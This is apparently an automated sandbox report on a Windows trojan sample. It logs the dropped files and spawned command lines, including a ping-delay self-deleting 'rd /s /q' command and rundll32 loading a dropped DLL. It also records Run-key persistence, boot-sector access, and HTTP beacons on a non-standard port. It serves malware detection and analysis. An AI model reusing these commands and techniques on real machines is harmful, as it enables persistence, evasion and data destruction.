Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50813 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:51630 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:55345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:63751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50549 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52511 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:59533 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:61399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52279 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:54480 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:57279 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:60439 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:63924 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52665 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:56120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:58943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:60788 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:64219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50153 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:53009 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:56323 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:58388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:61601 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:63849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50458 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:52420 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:55203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:58772 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000C160: wsprintfA,DeviceIoControl,5_2_1000C160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100049F0 ExitWindowsEx,5_2_100049F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10005A105_2_10005A10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000EB805_2_1000EB80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000DB905_2_1000DB90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100104005_2_10010400
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000F5005_2_1000F500
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100096405_2_10009640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000EF705_2_1000EF70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10011A56 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 292 times
Source: otsIBG7J9b.exeBinary or memory string: OriginalFilename vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000000.1679471285.0000000000400000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000000.1679491267.0000000000415000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000003.1682351281.0000000002280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exeBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/3@52/3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000C230 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,5_2_1000C230
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004F60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,5_2_10004F60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10006090 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,5_2_10006090
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004B90 AdjustTokenPrivileges,5_2_10004B90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004AA0 CreateToolhelp32Snapshot,5_2_10004AA0
Source: C:\Users\user\Desktop\otsIBG7J9b.exeCode function: 0_2_004013D0 FindResourceA,LoadResource,SizeofResource,LockResource,wsprintfA,wsprintfA,CreateDirectoryA,Sleep,wsprintfA,CreateFileA,WriteFile,CloseHandle,GetModuleFileNameA,wsprintfA,CreateProcessA,0_2_004013D0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\krnaver.com:6520
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Mkrnaver.com:6520
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Users\user\Desktop\otsIBG7J9b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\ufcpp.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe
Source: otsIBG7J9b.exeReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\otsIBG7J9b.exeFile read: C:\Users\user\Desktop\otsIBG7J9b.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\otsIBG7J9b.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\Users\user\Desktop\otsIBG7J9b.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ufcpp.exe c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
Source: C:\ufcpp.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\otsIBG7J9b.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ufcpp.exe c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"Jump to behavior
Source: C:\ufcpp.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\otsIBG7J9b.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\otsIBG7J9b.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\ufcpp.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ufcpp.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,5_2_100051B0
Source: initial sampleStatic PE information: section where entry point is pointing to: nsp0
Source: otsIBG7J9b.exeStatic PE information: real checksum: 0x1ddae should be: 0x209af
Source: ufcpp.exe.0.drStatic PE information: real checksum: 0x1ddae should be: 0x1dfbc
Source: otsIBG7J9b.exeStatic PE information: section name: nsp0
Source: otsIBG7J9b.exeStatic PE information: section name: nsp1
Source: ufcpp.exe.0.drStatic PE information: section name: nsp0
Source: ufcpp.exe.0.drStatic PE information: section name: nsp1
Source: yhnvs.dll.4.drStatic PE information: section name: nsp0
Source: yhnvs.dll.4.drStatic PE information: section name: nsp1
Source: C:\Users\user\Desktop\otsIBG7J9b.exeCode function: 0_2_004043B0 push eax; ret 0_2_004043DE
Source: C:\ufcpp.exeCode function: 4_2_004043B0 push eax; ret 4_2_004043DE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10010F90 push eax; ret 5_2_10010FBE
Source: otsIBG7J9b.exeStatic PE information: section name: nsp1 entropy: 7.905412884484882
Source: ufcpp.exe.0.drStatic PE information: section name: nsp1 entropy: 7.905412884484882
Source: yhnvs.dll.4.drStatic PE information: section name: nsp1 entropy: 7.935625569193875

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d5_2_1000C230
Source: C:\Users\user\Desktop\otsIBG7J9b.exeFile created: C:\ufcpp.exeJump to dropped file
Source: C:\ufcpp.exeFile created: C:\agtve\yhnvs.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: c:\agtve\ReadMe.txtJump to behavior

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d5_2_1000C230
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgrJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Deletes itself after installation
Source: C:\ufcpp.exeFile deleted: c:\users\user\desktop\otsibg7j9b.exeJump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50324 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50356 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50557 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50563 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50618 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50622 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50687 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50692 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50748 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50753 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50912 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51050 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51141 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51148 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51284 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51378 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51386 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51577 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51666 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51741 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52288 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52374 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53686 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55654 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55673 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56358 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57170 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57220 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58813 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58979 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60535 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60620 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62221 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62240 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64094 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64295 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52531 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52742 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54225 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54301 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56134 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56227 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57709 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57840 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59963 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60164 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60300 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61430 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61535 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63248 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63325 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65122 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65178 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50672 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52411 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53875 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53961 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54958 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55703 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55711 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57677 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58094 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59142 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59184 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60763 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60899 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62496 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62586 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64241 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64312 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65063 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65171 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52883 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53079 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54632 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54647 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56499 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56578 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57853 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57918 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59080 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59082 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60079 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60227 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61240 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61332 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62610 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62613 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64462 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64627 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49506 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49593 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51437 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53248 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53345 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54800 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56382 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56402 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57106 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57159 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58391 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58418 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59860 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59960 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62038 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62150 -> 12354
